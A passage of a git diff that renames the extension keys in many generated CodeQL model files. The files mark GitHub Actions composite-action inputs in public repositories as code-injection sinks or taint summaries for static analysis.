@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["defenseunicorns/zarf", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml index c246e5de06f..de09b35f1d4 100644 --- a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml +++ b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "input.results_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml index 13c0093fe4a..91e6268e614 100644 --- a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml +++ b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["department-of-veterans-affairs/vets-website", "*", "input.delimiter", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml index 49b226de1e8..777212d9a0a 100644 --- a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["devexpress/devextreme", "*", "input.name", "code-injection", "generated"] - ["devexpress/devextreme", "*", "input.result", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml index 9a6e0b88ba2..8cc0ab83a42 100644 --- a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml +++ b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["diggerhq/digger", "*", "input.checkov-version", "code-injection", "generated"] - ["diggerhq/digger", "*", "input.google-auth-credentials", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml index 4f88855a561..f1244bdd5de 100644 --- a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml +++ b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["diku-dk/futhark", "*", "input.script", "code-injection", "generated"] - ["diku-dk/futhark", "*", "input.slurm-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml index 5683d28567f..37814510c8c 100644 --- a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml +++ b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["discourse/.github", "*", "input.about_json_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml index 424c7241bcf..48e40c36bea 100644 --- a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml +++ b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dnsjava/dnsjava", "*", "input.name", "code-injection", "generated"] - ["dnsjava/dnsjava", "*", "input.filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml index 37295f2cf6c..0edb2c5f8cd 100644 --- a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dotintent/react-native-ble-plx", "*", "input.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml index e7c767d2dce..61210d17abb 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dotnet/docs-tools", "*", "input.support", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml index 7f78690f639..22dc1a40629 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dotnet/dotnet-monitor", "*", "input.files_to_commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml index ba1beace170..b2888b571a8 100644 --- a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml +++ b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dragonflydb/dragonfly", "*", "input.gspace-secret", "code-injection", "generated"] - ["dragonflydb/dragonfly", "*", "input.filter", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml index 63085c045d0..bc188d91f1b 100644 --- a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml +++ b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["drawpile/drawpile", "*", "input.cache_key", "output.cache_key", "taint", "manual"] - ["drawpile/drawpile", "*", "input.path", "output.path", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml index d6ee6c8bb7d..d5defe67401 100644 --- a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml +++ b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eksctl-io/eksctl", "*", "input.token", "code-injection", "generated"] - ["eksctl-io/eksctl", "*", "input.email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml index 83951f43c63..d97fedbed13 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elastic/apm-agent-dotnet", "*", "input.project", "code-injection", "generated"] - ["elastic/apm-agent-dotnet", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml index 397ab083809..e22c29b09f1 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elastic/apm-agent-java", "*", "input.tag", "code-injection", "generated"] - ["elastic/apm-agent-java", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml index 023abac3631..7203bb8345c 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["elastic/apm-server", "*", "input.version", "output.release-version", "taint", "manual"] - ["elastic/apm-server", "*", "input.version", "output.release-branch", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml index 5dd069df499..dcfbb0ea203 100644 --- a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml +++ b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elementor/elementor", "*", "input.README_TXT_PATH", "code-injection", "generated"] - ["elementor/elementor", "*", "input.CHANNEL", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml index 1a1d763d6e4..6c5d6edd572 100644 --- a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml +++ b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["emberjs/data", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml index a8e95d30457..fdaee61066e 100644 --- a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml +++ b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["emqx/emqx", "*", "input.profile", "code-injection", "generated"] - ["emqx/emqx", "*", "input.otp", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml index 52d085ee479..d68c4e57c8a 100644 --- a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml +++ b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eonasdan/tempus-dominus", "*", "input.VERSION", "code-injection", "generated"] - ["eonasdan/tempus-dominus", "*", "input.NUGET_API_KEY", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml index 33c56a67cb9..85a8d2f4d65 100644 --- a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml +++ b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["erlang/otp", "*", "input.TYPE", "code-injection", "generated"] - ["erlang/otp", "*", "input.BASE_BRANCH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml index 258101eecea..d2275409278 100644 --- a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml +++ b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["esphome/esphome", "*", "input.target", "code-injection", "generated"] - ["esphome/esphome", "*", "input.suffix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml index d77e05c680b..4dc0b87214b 100644 --- a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml +++ b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expensify/app", "*", "input.GPG_PASSPHRASE", "code-injection", "generated"] - ["expensify/app", "*", "input.PACKAGE_SCRIPT_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml index db98f8d769a..ea1a8a8afec 100644 --- a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expo/expo", "*", "input.ndk-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml index 7607840dbdc..5ce00c29e52 100644 --- a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expo/vscode-expo", "*", "input.command", "code-injection", "generated"] - ["expo/vscode-expo", "*", "input.semver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml index 2fa4f8dfa61..d1f551b66da 100644 --- a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["external-secrets/external-secrets", "*", "input.image-tag", "code-injection", "generated"] - ["external-secrets/external-secrets", "*", "input.image-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml index 80725157e33..6f8845ec1c0 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/buck2", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml index 9d317f14272..152fdfed447 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/flow", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml index 12deff387bd..5919ade7e81 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/yoga", "*", "input.version", "code-injection", "generated"] - ["facebook/yoga", "*", "input.directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml index 9c3c242b1ed..d9afa5bb21f 100644 --- a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebookresearch/xformers", "*", "input.arch", "code-injection", "generated"] - ["facebookresearch/xformers", "*", "input.pytorch_channel", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml index 4aa1ce5c4cf..0b36853a891 100644 --- a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fastly/compute-actions", "*", "input.fastly-api-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml index 6f8ef16ea33..2bd521d42f5 100644 --- a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml +++ b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["felangel/bloc", "*", "input.coverage_excludes", "code-injection", "generated"] - ["felangel/bloc", "*", "input.analyze_directories", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml index bc2146921ef..8ae81e706a4 100644 --- a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["firebase/firebase-ios-sdk", "*", "input.min-ios-version", "code-injection", "generated"] - ["firebase/firebase-ios-sdk", "*", "input.sources", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml index 37e1d0d67a5..4893772b71a 100644 --- a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml +++ b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["flagsmith/flagsmith", "*", "input.aws_ecr_repository_arn", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml index eabd3834b1b..e174c830a85 100644 --- a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml +++ b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flaxengine/flaxengine", "*", "input.vulkan-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml index 2253e33b950..14070215bfa 100644 --- a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-version", "code-injection", "generated"] - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml index bc1eb54056a..f3a0b47f2c2 100644 --- a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml +++ b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fluxcd/flux2", "*", "input.bindir", "code-injection", "generated"] - ["fluxcd/flux2", "*", "input.token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml index 842240cfaa2..12011d64396 100644 --- a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml +++ b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["forcedotcom/salesforcedx-vscode", "*", "input.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml index 8ff5ee1e2c0..40ecb17610e 100644 --- a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml +++ b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fossasia/visdom", "*", "input.loadprbuild", "code-injection", "generated"] - ["fossasia/visdom", "*", "input.usebasebranch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml index 29c5f793fb2..250606588f9 100644 --- a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["freckle/stack-action", "*", "input.find-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml index 2f12293df0e..f2f5678b8b8 100644 --- a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["freeradius/freeradius-server", "*", "input.gcc_ver", "code-injection", "generated"] - ["freeradius/freeradius-server", "*", "input.llvm_ver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml index 83012e51335..b17eb01f821 100644 --- a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml +++ b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gaphor/gaphor", "*", "input.version", "code-injection", "generated"] - ["gaphor/gaphor", "*", "input.base64_encoded_pfx", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml index 8ca21196194..7ebdde766f3 100644 --- a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml +++ b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getsentry/action-release", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml index 7f19fd1f6a6..7f2e1588139 100644 --- a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["github/codeql-action", "*", "input.latest_tag", "code-injection", "generated"] - ["github/codeql-action", "*", "input.major_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml index 1889fcff144..eedeb384422 100644 --- a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["github/ruby", "*", "input.builddir", "code-injection", "generated"] - ["github/ruby", "*", "input.srcdir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml index f8243352f45..fb6fb0267bb 100644 --- a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gittools/gitversion", "*", "input.distro", "code-injection", "generated"] - ["gittools/gitversion", "*", "input.targetFramework", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml index bd2015a7096..60df7484e7f 100644 --- a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml +++ b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["go-spatial/tegola", "*", "input.artifact_name", "code-injection", "generated"] - ["go-spatial/tegola", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml index 501123a82fe..d0af7b61f98 100644 --- a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml +++ b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["goauthentik/authentik", "*", "input.postgresql_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml index 1a17e3db2b8..8d08848d24c 100644 --- a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml +++ b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["godotengine/godot", "*", "input.bin", "code-injection", "generated"] - ["godotengine/godot", "*", "input.tests", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml index a125a4bfa8c..f26f672a586 100644 --- a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml +++ b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml @@ 